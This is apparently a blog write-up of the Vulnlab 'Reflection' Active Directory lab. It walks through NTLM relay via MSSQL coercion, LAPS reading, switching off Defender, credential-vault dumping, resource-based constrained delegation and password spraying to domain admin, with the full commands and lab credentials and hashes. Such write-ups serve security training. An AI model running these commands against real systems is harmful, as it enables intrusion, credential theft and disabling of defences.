Vulnlab — Reflection

ARZ101
9 min readAug 14, 2023

Reflection is a medium Active Directory chain which consists of three machines, MS01, WS01 and DC01 , from MS01, MSSQL staging credentials were found from smb share, which lead to relaying the NTLM hash on DC01’s smb shares, where the service account had access to the prod share containing credentials for production database, from where we’ll get two domain credentials, abbie.smith having GenericAll on MS01 through which can read the LAPS password and further dumping the Georgia.Price password from credential vault, this user also had GenericAll on WS01, having the full access on MS01, we can perform Resource Based Constrained Delegation (RBCD) and again from dumping we’ll get Rhys.Garner ‘s password, whose password we can reuse on DOM_RGARNER who is a part of domain admin.

NMAP

DC01.reflection.vl

PORT      STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-08-13 18:24:44Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2023-08-13T18:26:16+00:00; -1s from scanner time.
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: reflection.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49682/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
62571/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

MS01.reflection.vl

Host is up, received echo-reply ttl 127 (0.21s latency). 
Scanned at 2023-08-13 21:52:56 PKT for 264s
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
135/tcp open tcpwrapped syn-ack ttl 127
445/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open tcpwrapped syn-ack ttl 127
|_ssl-date: 2023-08-13T16:57:16+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=ms01.reflection.vl
5985/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048

WS01.reflection.vl

Host is up, received echo-reply ttl 127 (0.22s latency). 
Scanned at 2023-08-13 21:52:56 PKT for 264s
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
135/tcp open tcpwrapped syn-ack ttl 127
445/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open tcpwrapped syn-ack ttl 127
| ssl-cert: Subject: commonName=ws01.reflection.vl

PORT 445 (SMB)

Enumerating the smb shares from the machines, we only get list of shares with null authentication on MS01

Accessing staging share we’ll get staging_db.conf file having credentials

With crackmapexec we can try to authenticate on smb to verify if these are valid credentials

cme smb hosts.txt -u 'web_staging' -p 'Washroom510'

We can try authenticating over MSSQL as that service is running on DC01 and MS01

cme mssql hosts.txt -u 'web_staging' -p 'Washroom510' --local-auth

We get a valid login so we can proceed with using mssqlclient.py from impacket

mssqlclient.py web_staging:'Washroom510'@10.10.173.134

Since xp_cmdshell was not allowed for this user

We can try using xp_dirtree to coerce the server to our machine in order to retrieve NTLMv2 hash of service account of mssql

But cracking this hash didn’t worked as well

So we can’t crack this hash, maybe we can relay as smb signing is disabled

With ntlmrelayx.py we can realy the hash and authenticate

It shows that relaying on smb worked, we can also try to relay it on mssql running on DC01 which will allow us to execute queries as svc_web_staging

ntlmrelayx.py -t mssql://10.10.173.133 -smb2support --query 'SELECT @@version'

We can enumerate the databases, as here’s there’s one called prod

ntlmrelayx.py -t mssql://10.10.132.133 -smb2support --query 'SELECT name FROM master.dbo.sysdatabases;'

But listing the tables in that database didn’t worked as this user doesn’t have access , trying to enable xp_cmdshell didn’t worked here as well

So there was nothing we could do from here but as we saw previously that svc_web_staging was able to authenticate smb we can list shares and try to access shares from DC01, for this we need to use socks proxy as it’s going to keep the smb connection open and also lists the relays which were successful

ntlmrelayx.py -tf hosts.txt -smb2support -socks

It does show that this user is not an admin but still we can access the smb shares as a domain user with smbclient

To my surprise this didn’t worked and I don’t know the reason, maybe it’s an issue with my version of smbclient but with smbclient.py from impacket worked like a charm

proxychains smbclient.py reflection/svc_web_staging@10.10.132.133

From prod share we can grab prod_db.conf

Having the credentials for the production, we can enumerate the database

mssqlclient.py web_prod:Tribesman201@10.10.132.133

From the users table we'll get set of two credentials

On verifying these credentials, both of them are domain users

So now we can enumerate the domain with `bloodhound` , before doing that make sure to edit the hosts file for dc01.reflection.vl entry

python3 /opt/BloodHound.py-Kerberos/bloodhound.py -d 'reflection.vl' -u 'abbie.smith' -p 'CMe1x+nlRaaWEw' -ns 10.10.132.133 -c all

From bloodhound we see these two users are part of Staff group

But Staff group didn’t had any ACLs, abbie had GenericAll on MS01

Unfortunately we can’t just add a computer object as there’s 0 machine quota

However, since we have GenericAll, we can read LAPS on MS01 which is a randomized password for local administrator

cme smb 10.10.132.134 -u 'abbie.smith' -p 'CMe1x+nlRaaWEw' --laps
evil-winrm -i 10.10.132.134 -u 'administrator' -p 'H447.++h6g5}xi'

Disabling the defender with Set-MpPreference -DisableRealtimeMonitoring $true

Uploading netcat and getting a shell again as evil-winrm was causing an issue with mimikatz

From the cache, we see Georgia.Price

With vault::cred /patch we can list the credentials from the credential vault

Going back to bloodhound, this user also has GenericAll on WS01

We know that there’s no machine quota available but we do have access to MS01, we can add that machine in WS01’s msDS-AllowedToActOnBehalfOfOtherIdentity property, for this we need to get the NThash of MS01

Editing the msDS-AllowedToActOnBehalfOfOtherIdentity with rbcd.py from impacket

rbcd.py -action write -delegate-to "WS01$" -delegate-from "MS01$" -dc-ip 10.10.188.197 "Reflection/Georgia.Price:DBl+5MPkpJg5id"

After adding the property, we can impersonate the administrator ticket on WS01 with getST.py

getST.py -spn 'cifs/WS01.reflection.vl' -impersonate Administrator -dc-ip 10.10.188.197 'Reflection/MS01$' -hashes ':6e77d4ac157a47c5581681b8f865677e'

And now we can dump hashes from WS01

secretsdump.py administrator@WS01.reflection.vl -k -no-pass

Since defender was enabled on WS01 we couldn’t get a shell through psexec.py

We can however use atexec.py to schedule the commands to be executed in order disable defender

atexec.py ws01/administrator@10.10.188.199 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"' -hashes ':a29542cb2707bf6d6c1d2c9311b0ff02

After this, we’ll be able to use psexec to get a shell

psexec.py administrator@WS01.reflection.vl -hashes ':a29542cb2707bf6d6c1d2c9311b0ff02'

As we already dumped hashes, we have Rhys.Garner’s password who is a local admin on WS01, this user didn’t had any ACLs on any object, checking the domain admins, there are only 3

We can try spraying the password on them to see if we can get access to those users

Which worked on DOM_RGARNER, with this we can login on DC01 through winrm and become domain admin

References

--

--